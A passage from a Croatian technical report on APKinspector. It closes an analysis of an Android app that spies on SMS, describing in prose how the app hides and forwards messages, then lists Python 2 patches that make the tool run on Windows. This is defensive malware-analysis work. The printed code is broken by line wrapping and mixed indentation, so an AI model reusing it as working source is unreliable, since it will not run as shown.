  Kad se došlo do svih potrebnih informacija o inicijalizaciji, vrijednosti i značenju varijabla, može se objasniti što prethodni if else odsječak uistinu radi. U if else odsječku se dobiju brojevi pošiljatelju u obliku Stringa. Zatim se provjerava je li niz znakova manji od 160 znakova u slučaju čega se kod prekida, a na kraju odsječka je for petlja koja, dok god ima varijabla stringtokenizer sadrži tokene, odnosno brojeve telefona na koje se prosljeđuje primljena SMS poruka, šalje tu poruku na određeni broj telefona.

4.4. Zaključak analize

Iz analize ovog programa ustanovilo se da je program namijenjen špijunaži SMS poruka na telefonu. Program je inicijalno sakriven, a otkriva se slanjem određene SMS poruke kad postane vidljiv i proces. SMS poruke obrađuju zahvaljujući Broadcast receiveru, a proces obrade se sastoji od provjere je li poruka ustvari lozinka za prikaz programa čime program postane vidljiv te, ako poruka nije lozinka, provjere je li program aktiviran čime se s baze podataka dohvaćaju brojevi mobitela te se na te brojeve šalje primljena SMS poruka. Sama aktivnost prikaza programa ne sadrži zloćudni kod, već mijenja podatke u bazi podataka.5. Kompatibilnost programa za rad na Windowsima

Program inicijalno ne podržava u potpunosti rad na Windowsima. Program se pokrene no jedino što se prikazuje su Stringovi, razredi, metode te Dalvik kod dok sve ostalo ne radi ili se ispisuju krivi podatci. Program je moguće osposobiti no moraju se napraviti određene modifikacije u izvornom python kodu.

5.1. Opis nefunkcionalnosti programa

5.1.1. Prikaz podataka u kartici CFG

Program prikazuje Control Flow Graph parsiranjem teksta koji opisuje graf, no parsiranje se ne obavlja ispravno. Indeksi polja nisu dobro postavljeni, no metodom ispisa i ispravljanja došlo se do ispravnog zapisa. Parsiranje se obavlja u datoteci xdotParser.py.

5.1.2. Prikaz podataka u kartici AndroidManifest.xml

AndroidManifest.xml datoteka se inicijalno prikaže u programu, no ispis je neispravan, odnosno, prikaže se datoteka koja se nalazi u primjeru pri dohvaćanju programa. Do neispravnog rada dolazi zbog krivog poziva alata apktool. Program je prvenstveno napravljen za Linux, a time i pozivi shella pa se do rješenja dolazi modifikacijom poziva naredbe u datoteci APKtool.py.

5.1.3. Prikaz podataka u kartici Smali

Problem prikaza podataka Smali datoteka je rezultat neispravnog prikaza datoteke AndroidManifest.xml. Budući da se alat apktool pozove neispravno, time se ne stvore ni Smali datoteke pa program izbacuje ulazno-izlaznu grešku (IOError). Rješenjem prethodnog problema, riješi se i ovaj.

5.1.4. Prikaz .java datoteka

U prikazu .java datoteka dolazi do problema zbog neispravnog poziva alat, kao i kod prethodnih problema, te drugačijeg prikaza puteva do direktorija u Windowsima. Do rješenja ovog problema se dolazi u nekoliko koraka:

 1. Treba dohvatiti datoteku Jad 1.5.8g for Windows 9x/NT/2000 on Intel platform koja se dohvaća sa:

  Jad 1.5.8g for Windows 9x/NT/2000 on Intel platform

  te .exe datoteku, koja se nalazi u dohvaćenoj .zip datoteci spremiti u direktorij /jad158e.linux.static. DIR_PROJEKTA je direktorij gdje je spremljen projekt, a jad158e.linux.static je direktorij gdje je originalno spremljen JAD za Linux, a ime je ostavljeno isto radi jednostavnosti.

 2. Treba dohvatiti datoteku unzip.exe sa sljedeće stranice:

  http://stahlworks.com/dev/?tool=zipunzip

  te je spremiti u direktorij gdje je direktorij u kojem je spremljen projekt.

 3. Modificirati datoteke StartQT.py i JAD.py

5.2. Modificirani izvorni kodovi

5.2.1. xdotParser.py

              
import sys
if sys.path[0] == "":
	sys.path.append(sys.path[1]+"/androguard/")
	PATH_INSTALL = sys.path[1]+"/androguard"
else:
	sys.path.append(sys.path[0]+"/androguard/")
	PATH_INSTALL = sys.path[0]+"/androguard"
sys.path.append(PATH_INSTALL + "./")
sys.path.append(PATH_INSTALL + "/core")
sys.path.append(PATH_INSTALL + "/core/bytecodes")
sys.path.append(PATH_INSTALL + "/core/predicates")
sys.path.append(PATH_INSTALL + "/core/analysis")
sys.path.append(PATH_INSTALL + "/core/vm")
sys.path.append(PATH_INSTALL + "/core/wm")
sys.path.append(PATH_INSTALL + "/core/protection")
sys.path.append(PATH_INSTALL + "/classification")
 
import androguard, analysis, androlyze
import bytecode
from dvm import *
from APKInfo import *
from GetMethods import *
from Graph import *
from GetMethods import *
from CallInOut import *
class XDot:
  method = None
  vmx = None
  buff = None
  xdot = None
 
  
  def __init__(self, method, vm, vmx):
    self.method = method
    self.vmx = vmx
    self.buff = ""
  
  def method2xdot(self):
    import pydot
    self.buff = "digraph code {\n"
    self.buff += "graph [bgcolor=white];\n"
    self.buff += 
    "node [color=red, 
        style=filled shape=box 
        fontname=\"Courier\" fontsize=\"8\"
       ];\n"
    self.buff += "splines=ortho"
    self.buff += 
      bytecode.method2dot(self.vmx.get_method(self.method))
    self.buff += "}"
    d = pydot.graph_from_dot_data(self.buff)
    if d:
      self.xdot = d.create_xdot()
      print "method2xdot\n"
#      print self.buff
      file = open('method2dot.txt','a')
      file.write("%s\n" % self.xdot)
      file.close
# yuan build the call graph
  def call2xdot(self, methodInvokeList, allmethod):
    import pydot
   
    callInOut = CallInOut(methodInvokeList) 
    className = self.method.get_class_name()
    methodName = self.method.get_name()
    descriptor = self.method.get_descriptor()
    callMethod = 
      className + " " + 
      descriptor + "," + 
      methodName
    callInList= callInOut.searchCallIn(callMethod)
    callOutList = callInOut.searchCallOut(callMethod)
    
    Dir = callInOut.invokeDir2
    callList = []
   
    label = ""
  
    self.buff = "digraph code {\n"
    self.buff += "graph [bgcolor=white];\n"
    self.buff += 
      "node [color=lightgray, 
          style=filled 
          shape=box fontname=\"Courier\" fontsize=\"8\"
         ];\n"
    self.buff += "splines=ortho"
    i = 0
    j = 100
    label2name = {}
    """
    for I in allmethod:
      i += 1
      Im = I.get_class_name() + 
         " " + I.get_descriptor() +
         "," + I.get_name()
      node_name = "%s" % i
      label = Im
      label2name[label] = node_name
 
      self.buff += 
        "\"%s\" [color=\"lightgray\", 
             label=\"%s\"]\n" 
            % (node_name, label)
    print "total method count = %s" % i
    """
    
    for I in allmethod:
       Im = I.get_class_name() + " " + 
          I.get_descriptor() +"," + 
          I.get_name()
       if Im not in Dir.keys():
          continue
       callList = Dir[Im]
       lenth = len(callList)
       for l in range (0, lenth ):
          col = "blue"
          if not label2name.has_key(Im):
           node_from = "node%s" % i
           label2name[Im] = node_from
           self.buff += 
            "\"%s\" [color=\"lightgray\", 
                 label=\"%s\"]\n" % 
                (node_from, Im)
           i += 1
          else:
           node_from = label2name[Im]
          if not label2name.has_key(callList[l]):
           node_to = "node%s" % i
           label2name[callList[l]] = node_to
           self.buff += 
            "\"%s\" [color=\"lightgray\", 
                label=\"%s\"]\n" % 
                (node_to, callList[l])
           i += 1
          else:
           node_to = label2name[callList[l]]
          try:
#           self.buff += 
                "\"%s\" -> \"%s\" [color=\"%s\"];
                \n " % (Im, callList[l],col ) 
           self.buff += 
                "\"%s\" -> \"%s\" [color=\"%s\"];
                \n " % (node_from, node_to,col ) 
          except:
           print "error"
    """
    for I in callInList:
      i += 1
      label = I
      self.buff += "\"%s\" 
        [color=\"lightgray\", label=\"%s\"]\n" % (i, label)
      self.buff += "\"%s\" 
        -> \"%s\";\n " % (I, callMethod )
      
    for O in callOutList:
      j += 1
      label = O
      self.buff += "\"%s\" 
        [color=\"lightgray\", label=\"%s\"]\n" % (j, label)
      self.buff += "\"%s\" 
        -> \"%s\";\n " % (callMethod, O )  
 #   for I in callInList:
 #   for O in callOutList:
 
    """
  
    self.buff += "}"
    file = open('callbuff.txt','a')
    file.write("%s\n" % self.buff)
    file.close        
    d = pydot.graph_from_dot_data(self.buff)
    if d:
      self.xdot = d.create_xdot()
#      print "xdot\n\n"
#      print self.xdot
#      print "call2xdot\n"
 #     print self.buff
      file = open('call2dot.txt','a')
      file.write("%s\n" % self.xdot)
      file.close
      d.write_svg("3.svg")
  def printxdot(self):
    print self.xdot
    
  def transform(self, point_y, pageHeight):
    return pageHeight - point_y
  
  def parse(self):
    pagesize = [0, 0]
    nodeList = []
    linkList = []
# Modified code segment by Valerio Frankovic
# Parsing did not work well so I had to
# modify code in order to work well
# Modified units are mostly parameters.
    start = self.xdot.index("bb=\"0,0,")+9
    end = self.xdot[start:].index("\"") + start
    [pagesize[0], pagesize[1]] = 
      self.xdot[start:end].split(",")
    if pagesize == ['0', '0']:
      return [[0, 0], nodeList, linkList]
      
    # turn the String type to the Float type
    [pagesize[0], pagesize[1]] = 
      [string.atof(pagesize[0]),
       string.atof(pagesize[1])]
    # In parseStr, we can get all information 
     about each node and link
    parseStr = 
      self.xdot[self.xdot[end:].index("];")+ 
      end + 2 : len(self.xdot)-2]
# End of modification
    
	parseStr = parseStr.replace("\t", "")
    parseStr = parseStr.replace("\n", "")
    parseStr = parseStr.replace("\\l", "\n")
    
    parselist = parseStr.split("];")
    file = open("parselistmethod.txt",'w')
    file.write("%s" % parselist)
    file.close()
	iterparse = iter(parselist)
	next(iterparse)
	i = next(iterparse)
    for j in iterparse:
      if i.find("->") == -1 and i != '':
# Modified code segment by Valerio Frankovic
# Parsing did not work well so I had to
# modify code in order to work well
# Modified units are mostly parameters.
        start = i.index("label=") + 7
        end = i[start:].index("\"") + start
        # label is the content of the node
        label = i[start : end]
        label = label.replace("\\", "")
        start = i.index("P 4 ") + 4
        end = i[start:].index("\"") + start
        
        points = i[start:end]
        points.strip()
        points = points.split(" ")
        width = 
          string.atof(points[0]) - 
          string.atof(points[2])
        height = 
          string.atof(points[3]) - 
          string.atof(points[5])
        point_x = string.atof(points[2])
        point_y = 
          self.transform(
            string.atof(points[3]), 
            pagesize[1]
          )
        # this point is the left-top point
        point = [point_x, point_y]
# End of modification
        
        node = 
          Node(point[0],
             point[1], 
             width, 
             height)
        node.setText(label)
        node.setHint(label)
        nodeList.append(node)
		i = j
      elif i != '':
        i = i.replace("\\", "")
        
# Modified code segment by Valerio Frankovic
# Parsing did not work well so I had to
# modify code in order to work well
# Modified units are mostly parameters.
		
        color = 
        i[i.index("color=")+6:i.index("pos")-2]
        path = 
        i[i.index("pos=\"e,")+7:i.index("\"")]
        path = path.replace(",", " ")
        path = path.split(" ")
        path = path[2:]
        
        
        for j in range(0, len(path)):
          if j % 2 == 1:
            path[j] = 
            self.transform(
              string.atof(path[j]), 
              pagesize[1])
          else:
            path[j] = string.atof(path[j])
          
        arrow = i[i.rindex("P 3 ")+
             4: i.rindex(" \"")]
        arrow = arrow.split(" ")
# End of modification
        
        for j in range(0, len(arrow)):
          if j % 2 ==1:
            arrow[j] = 
            self.transform(
              string.atof(
                arrow[j]), 
                pagesize[1])
          else:
            arrow[j] = 
              string.atof(arrow[j])
        
        link = Link()
        link.setColor(color)
        link.drawLine(path)
        link.drawArrow(arrow)
        linkList.append(link)
   
    return [pagesize, nodeList, linkList]
  def parsecall(self):
    pagesize = [0, 0]
    nodeList = []
    linkList = []
# Modified code segment by Valerio Frankovic
# Parsing did not work well so I had to
# modify code in order to work well
# Modified units are mostly parameters.
    start = 
      self.xdot.index("bb=\"0,0,")+9
    end = 
      self.xdot[start:].index("\"") +
      start
    [pagesize[0], pagesize[1]] = 
      self.xdot[start:end].split(",")
    if pagesize == ['0', '0']:
      return [[0, 0], nodeList, linkList]
# End of modification
      
    # turn the String type to the Float type
    [pagesize[0], pagesize[1]] = 
    [string.atof(pagesize[0]), 
     string.atof(pagesize[1])]
    # In parseStr, we can get all 
    information about each node and link
    parseStr = 
    self.xdot[self.xdot[end:].index("];")+ 
    end + 2 : len(self.xdot)-2]
    
    
    parseStr = parseStr.replace("\t", "")
    parseStr = parseStr.replace("\r\n", "")
    parseStr = parseStr.replace("\\l", "\n")
    
    parselist = parseStr.split("];")
    file = open("parselistcall.txt",'w')
    file.write("%s" % parselist)
    file.close()
    for i in parselist:
      if i.find("->") == -1 and i != '':
# Modified code segment by Valerio Frankovic
# Parsing did not work well so I had to
# modify code in order to work well
# Modified units are mostly parameters.
        try:
         start = i.index("label=") + 7
 #        start = i.find("label=") + 7
         end = i[start:].index("\"") + start
        # label is the content of the node
         label = i[start : end]
         label = label.replace("\\", "")
        except:
          label = "123"
          end = 0
        
        try:
         start = i[end:].index("P 4 ") + end + 4
         end = i[start:].index("\"") + start
# End of modification
        
        
         points = i[start:end]
         points.strip()
         points = points.split(" ")
         width = 
          string.atof(points[0]) - 
          string.atof(points[2])
         height = 
          string.atof(points[3]) - 
          string.atof(points[5])
         point_x = string.atof(points[2])
         point_y = 
          self.transform(
            string.atof(
              points[3]), 
            pagesize[1])
        # this point is the left-top point
         point = [point_x, point_y]
        except:
         print "Error = %s" % i
         point = [0.0, 0.0]
         width = 50.0
         height = 40.0
        
        node = Node(
          point[0], point[1],
          width, height)
        node.setText_call(label)
        node.setHint(label)
        nodeList.append(node)
      elif i != '':
        i = i.replace("\\", "")
# Modified code segment by Valerio Frankovic
# Parsing did not work well so I had to
# modify code in order to work well
# Modified units are mostly parameters.
        
        color = 
          i[i.index("color=")+
          6:i.index("pos")-1]
        path = 
          i[i.index("pos=\"e,")+
          7:i.index("\"")]
        path = 
          path.replace(",", " ")
        path = path.split(" ")
        path = path[2:]
        
        
        for j in range(0, len(path)):
          if j % 2 == 1:
            path[j] = 
            self.transform(
              string.atof(path[j]), 
              pagesize[1])
          else:
            path[j] = 
            string.atof(path[j])
        try :        
          arrow = 
            i[i.rindex("P 3 ")+
            4: i.rindex(" \"")]
          arrow = arrow.split(" ")
        except:
          print 123
# End of modification
        for j in range(0, len(arrow)):
          if j % 2 ==1:
            arrow[j] = 
            self.transform(
              string.atof(arrow[j]), 
              pagesize[1])
          else:
            arrow[j] = 
              string.atof(arrow[j])
      
        link = Link()
        link.setColor(color)
        link.drawLine(path)
        link.drawArrow(arrow)
        linkList.append(link)
   
    return [pagesize, nodeList, linkList]

5.2.2. APKtool.py

import os
import sys
import Global
from startQT import SYSPATH
# Modifications made by Valerio Frankovic
# use the apktool to get the smali codes and AndroidManifest.xml
# return 1: success ; return 0: fail
def callAPKtool(filename):
  outputPath = os.getcwd() + "/temp/ApktoolOutput"
  cmd = "java -jar apktool.jar d -d -f " + "\"" + 
     filename + "\"" + " " + "\"" + outputPath + 
     "\""
  if os.system(cmd) !=0:
    return 0
  else:
    return 1
class APKtool:  
  firstFlag = None
  lastClassName = None
  
  def __init__(self):
    print "apktool 2"
#    self.successFlag = Global.FLAG_APKTOOL
    self.successFlag = 1
    self.firstFlag = 0
    self.lastClassName = ""
  def getManifest(self):
    if self.successFlag == 0:
      print "apktool fail3"
      return [0, ""]
    print "apktool success 4"
    path = 
      SYSPATH + "/temp/ApktoolOutput/AndroidManifest.xml"
    try:
      data = open(path, "r").read()
    except IOError:
      print "IOError"
      data = ""
    return [1, data]
  # get the smali codes
  def getSmaliCode(self, className):
    if self.successFlag == 0:
      return [0, ""]
    print className
      
    className = className[1:-1] + ".smali"
    # this is the first time to call method "getSmaliCode"
    if self.firstFlag == 0:
      self.firstFlag ==1
      self.lastClassName = className
	  print os.getcwd()
	  print className
      classPath = os.getcwd() + 
        "/temp/ApktoolOutput/smali/" + className
      try:
        data = open(classPath, "r").read()
      except IOError:
        print "IOError"
        data = ""
      return [1, data]
    
    # if the lastClassName is equal to className, 
      the smali codes need not to be updated
    if self.firstFlag == 1:
      if self.lastClassName == className:
        return [0, ""] 
      else:
        self.lastClassName = className
        classPath = SYSPATH + 
              "/temp/ApktoolOutput/" + className
        data = open(classPath, "r").read()
        return [1, data]
               
              
5.2.3. JAD.py

import os
import sys
import zipfile
from startQT import SYSPATH
# Modifications made by Valerio Frankovic
# System calls were not suitable for Windows OS
# delete all files and dirs in the "./temp/" dictionary
# return 0: success;
def clear():
  cmd = "rd /s /q " + "\"" + SYSPATH + "/temp" + "\""
  return os.system(cmd)
# use the dex2jar to generate the .jar file.
# Then move .jar file to the "./temp/" dictionary
# At last, unzip the .jar file to "./temp/" dictionary
# return 1: success ; return 0: fail
def dex2jar(filename):
  cmd1 = 
    SYSPATH + "/dex2jar/dex2jar.bat " +
    "\"" + filename + "\""
  if os.system(cmd1) !=0:
    return 0
  
  newfilename = os.path.split(filename)[-1]
  newfilename = 
    os.path.splitext(newfilename)[0] + "_dex2jar.jar"
  cmd2 = "move /y " + "\"" + 
      os.path.dirname(filename) + 
      "\\" + newfilename + "\"" 
      + " " + "\"" + os.getcwd() + 
      "/temp/" + "\""
  print cmd2
  path = 
    os.path.join(os.getcwd(), "temp")
  print path
  if not os.path.exists(path) : os.makedirs(path)
  if os.system(cmd2) !=0:
    return 0
 
  if unzip(SYSPATH + "/temp/" + newfilename) != 0:
    return 0
  
  return 1
# unzip the .jar file
# return 0: success;
def unzip(filename):
  cmd = 
    "unzip -o " + filename + 
    " -d" + "\"" + SYSPATH + "\"" + 
    "/temp/unzip"
  return os.system(cmd)
# decompile the apk to the Javacodes
# parameter:
#    filename: the full absolute path of the apk file
# return 1: success; return 0:fail
def decompile(filename):
  if clear() != 0:
    return 0
    
  if dex2jar(filename) != 1:
    return 0
  path = os.path.join(os.getcwd(), "temp/java")
  print path
  if not os.path.exists(path) : os.makedirs(path)
  for root, dirs, files in os.walk(SYSPATH + "/temp/unzip"):
	for file in files:
	   if file.endswith(".class"):
		cmd = 
      SYSPATH + "/jad158e.linux.static/jad" + 
      " -o -r -sjava -d" + 
" " + SYSPATH + "/temp/java/ " + os.path.join(root, file)
  		print cmd
		path = root
        print path
	    if not os.path.exists(path) : os.makedirs(path)
  		if os.system(cmd) != 0:
	     return 0
  return 1
                
                
5.2.4. StartQT.py

Kod u ovoj datoteci je poprilično velik, tako da neće biti cijeli u ovoj datoteci već samo metoda koju treba zamijeniti:


def Tab_Files(self, filename):
    """
      build the Files Tab
      @param filename: the opened apk's filename
    """
    print "enter tabfiles"
    self.treeWidget_files.clear()
    self.treeWidget_files.setColumnCount(2)
    
    # create a connect between signal and slot.
    self.connect(self.treeWidget_files, SIGNAL(
      "itemDoubleClicked(QTreeWidgetItem *, int)"),
    self.locateFile)
    pheader = self.treeWidget_files.header()
    pheader.setResizeMode(3)
    pheader.setStretchLastSection(0)
    
    self.treeWidget_files.setStyleSheet(
      "QTreeView::item:hover{
        background-color:rgb(0,255,0,50)}"
      "QTreeView::item:selected{
        background-color:rgb(255,0,0,100)}"
    )
    import Global
    for i in range(100):
      time.sleep(100)
      print "########still ded"
      print i
      if Global.FLAG_JAD == 1:
       print "ded finish"
       break
#    while True:
#      time.sleep(100)
#      i=i+1
#      print "########still ded"
#      if Global.FLAG_JAD == 1:
#       break
     
#    if Global.FLAG_JAD != 1:
#      return
# Modifications made by Valerio Frankovic
# In Windows, for loop does not show adequate directory names
    rootpath = SYSPATH + "/temp/java"
    parent = self.treeWidget_files
    path2parent = {rootpath:parent}
    for root, dirs, files in os.walk(rootpath):
	  newroot = string.replace(root, '\\\\', '\\')
      for f in files:
        parent = path2parent[newroot]
        child = QTreeWidgetItem(parent)
        child.setText(0, f)
      for d in dirs:
        parent = path2parent[newroot]
        child = QTreeWidgetItem(parent)
        child.setText(0, d)
        path2parent[newroot + "\\" +d] = child
# End of modification

                

5.3. Napomene o programu

Program bi nakon prethodnih promjena trebao pružiti potpunu funkcionalnost na Windows operativnim sustavima, no treba paziti na sljedeće:

 • Prije pokretanja programa treba postojati direktorij Temp u direktoriju gdje je spremljen projekt

 • Preporučuje se da put projekta ne sadrži razmake jer bi mogli prouzročiti nefunkcionalnosti

 • Za sve nedoumice može se kontaktirati autora ovoga dokumenta na valerio.frankovic@hotmail.com6. Zaključak

APKinspector je vrlo moćan program kada ispravno radi. Izuzev naporne instalacije, pravo je zadovoljstvo raditi s ovim programom. Omogućuje cijeli niz alata počevši od grafa, Dalvik, Byte i Smali kodova pa do rekonstrukcije izvornog koda, ulaznih i izlaznih poziva te prikaza AndroidManifest.xml-a. Mogu se vidjeti i svi korišteni Stringovi, razredi te metode pa je time analiza zloćudnog koda svakako olakšana jer analitičari imaju mnogo opcija za odabir tehnike analize, a i sam program je jednostavan za korištenje. Program je još uvijek u razvojnoj fazi te je program otvorenog koda tako da su svi zainteresirani pozvani da sudjeluju u razvoju ovog programa, a kad bude dovršen, sigurno će biti standardni alat svakoga reverznog analitičara koji se bavi otkrivanjem zloćudnih programa za Android operativni sustav.7. Literatura

[1] APKinspector. https://code.google.com/p/apkinspector/

[2] APKInspector BETA Demo [GSOC 2011].https://www.youtube.com/watch?v=X538N-x3UUY

[3] Android developers. http://developer.android.com/index.html

[4] Dunham K., Hartman S., Quintans M., Morales J. A., Strazzere T. (2014). Android Malware and Analysis. Boca Raton, FL: CRC Press.

[5] Python 2.7.9 documentation. https://docs.python.org/2/